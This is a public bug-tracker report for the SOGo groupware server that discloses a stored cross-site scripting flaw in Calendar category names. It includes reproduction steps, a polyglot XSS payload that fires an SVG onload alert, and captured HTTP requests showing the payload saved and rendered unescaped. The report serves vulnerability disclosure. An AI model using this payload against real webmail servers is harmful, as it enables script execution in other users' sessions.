View Issue Details

Jump to NotesJump to History
IDProjectCategoryView StatusDate SubmittedLast Update
0006006SOGoWeb Calendarpublic2024-08-19 23:572024-09-12 06:58
Reporterjulian123 Assigned Toqhivert  
PrioritynormalSeverityminorReproducibilityalways
Status closedResolutionduplicate 
Platform[Server] LinuxOSUbuntuOS Version16.04 LTS
Product Version5.10.0 
Summary0006006: Calendar Categories Stored-XSS
Description

A cross-site scripting payload can be stored in the Calendar category fields, leading to execution when the user navigates to their inbox.

Steps To Reproduce
  1. Authenticate to the application.
  2. Navigate to Preferences > Calendar > Categories
  3. Edit an existing category or add a new category, placing the following payload in the form field:
    //</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1)//>\\x3e
  4. Select Save
  5. Navigate to the user's inbox and observe the XSS payload execute.
Additional Information

POST /SOGo/so/john@123.com/Preferences/save HTTP/1.1
Host: 192.168.2.96
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.2.96/
Content-Type: application/json;charset=utf-8
X-XSRF-TOKEN: ac1a2fd18ca6a5119b777957e01d6f71148f1317
Content-Length: 3866
Origin: http://192.168.2.96
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: 0xHIGHFLYxSOGo=

...snip...
},"defaults":{"SOGoCalendarCategoriesColors":{"Customer":"#F8D800","Calls":"#0396FF","Favorites":"#EA5455","Meeting":"#7367F0","Ideas":"#32CCBC","Miscellaneous":"#F6416C","Birthday":"#28C76F","Anniversary":"#9F44D3","Vacation":"#623AA2","Travel":"#F55555","Projects":"#8C1BAB","Suppliers":"#9708CC","Gifts":"#736EFE","Clients":"#E96D71","Issues":"#3677FF","Business":"#FA016D","Holidays":"#0E197D","Personal":"#DE4313","Status":"0002661","Competition":"#6018DC","Follow up":"#D939CD","//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1112)//>\\x3e":"#E80505"

GET /SOGo/so/john@123.com/Preferences HTTP/1.1
Host: 192.168.2.96
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Sec-GPC: 1
Connection: keep-alive
...snip...
<script id="UserDefaults" type="text/json">
{"SOGoCalendarCategoriesColors":{"//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1112)//>\\x3e":"

Tagscalender

Relationships

Relationship GraphDependency Graph
related to 0006010 closedqhivert Stored-XSS in Reply to Email 
related to 0006004 resolvedqhivert Stored-XSS in Contacts Category Fields 

Activities

There are no notes attached to this issue.

Issue History

Date Modified Username Field Change
2024-08-19 23:57 julian123 New Issue
2024-08-19 23:57 julian123 Tag Attached: calender
2024-08-20 14:08 qhivert Relationship added related to 0006010
2024-08-20 14:08 qhivert Relationship added related to 0006004
2024-09-12 06:58 qhivert Assigned To => qhivert
2024-09-12 06:58 qhivert Status new => closed
2024-09-12 06:58 qhivert Resolution open => duplicate